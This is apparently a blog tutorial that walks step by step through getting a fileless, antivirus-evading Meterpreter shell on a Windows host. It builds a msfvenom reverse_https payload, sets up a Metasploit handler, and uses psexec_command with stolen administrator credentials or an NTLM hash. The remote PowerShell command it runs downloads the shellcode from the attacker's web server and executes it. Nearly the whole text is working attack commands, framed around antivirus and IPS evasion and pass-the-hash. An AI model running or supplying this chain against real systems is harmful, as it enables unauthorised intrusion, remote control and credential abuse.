In this tutorial I will walk through how to create a Meterpreter session that will bypass antivirus while not touching the disk and injecting directly into memory.  This method is useful when the normal psexec exploit module fails.

First there are a couple assumptions to start with:

  1. You can communicate with the target and the target can communicate with you.
  2. You have already obtained administrator level credentials or a hash by other means.

This tutorial will use the Invoke-Shellcode.ps1 PowerSploit module from PowerShellMafia to execute custom shellcode.

  1. Copy Invoke-Shellcode.ps1 to a local directory.
    root@Oak:~/PowerSploit# wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
  2. Create the payload using msfvenom and append the output to Invoke-Shellcode.ps1
    msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.2.38 LPORT=8443 EXITFUNC=thread -f ps1 >> Invoke-Shellcode.ps1
  3. Start Metasploit
  4. Configure a handler to receive our reverse https connection (Tip: useful for IPS evasion)
    # Select the handler
    use exploit/multi/handler
    # Set the payload. This must match what was set in msfvenom
    set payload windows/x64/meterpreter/reverse_https
    set lport 8443
    set lhost 0.0.0.0
    set exitfunc thread
    # To receive multiple meterpreter sessions set ExitOnSession false
    set ExitOnSession false
    # Run as a job
    run -j
  5. To execute the Powershell script, we will use psexec_command auxiliary module
    use auxiliary/admin/smb/psexec_command
  6. To both load the PowerShell script and execute it in one command, we call it after the semicolon.
    #Ensure to properly escape the single quotes in the PowerShell command
    set command powershell.exe -exec bypass -Command IEX (New-Object system.Net.WebClient).DownloadString(\'http://10.0.2.38/Invoke-Shellcode.ps1\');Invoke-Shellcode -Shellcode @($buf) -Force
    set rhosts targetip
    set smbuser targetusername
    #The smbpass option can either be a password or an NTLM hash.
    set smbpass hash
    #This is optional, but I've had success with cleanup using the delay option.
    set delay 20
  7. Run a simple http webserver (Tip: this is handy to immediately see that the target was able to access the PowerShell script.)
  8. cd to the directory where the PowerShell script is located
  9. Start the python webserver
    python -m SimpleHTTPServer 80
  10. Run the exploit.
  11. If all goes as planned a Meterpreter session will be opened.
    psexec_command
Advertisements